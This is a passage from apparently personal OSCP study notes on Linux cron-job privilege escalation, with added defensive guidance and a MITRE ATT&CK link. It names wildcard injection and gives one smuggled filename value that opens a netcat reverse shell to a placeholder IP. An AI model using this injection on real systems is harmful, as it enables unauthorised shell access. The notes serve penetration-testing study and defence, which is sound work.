thomasdefise/OSCP_Resources/Enumeration/Linux101.md

 2. Search for wildcard injection vulnerability such as tar, chown and chmod (cc Wildcard)
 3. Search for execution within the script that use a folder or file that can be changed to '; nc -c bash IP PORT

+:white_check_mark: How to protect against or detect that technique:

+- *Architecture*: Ensure permissions on /etc/crontab, /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.d are configured
+- *Architecture*: Ensure at/cron is restricted to authorized user
+- *Architecture*: Ensure that scripts that may be run by cron are only accessible by privileges users
+- *Active Defense*: Detect modifications made to cron jobs

 For more information about that technique refer to [T1053.003 - Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/)

 #### $PATH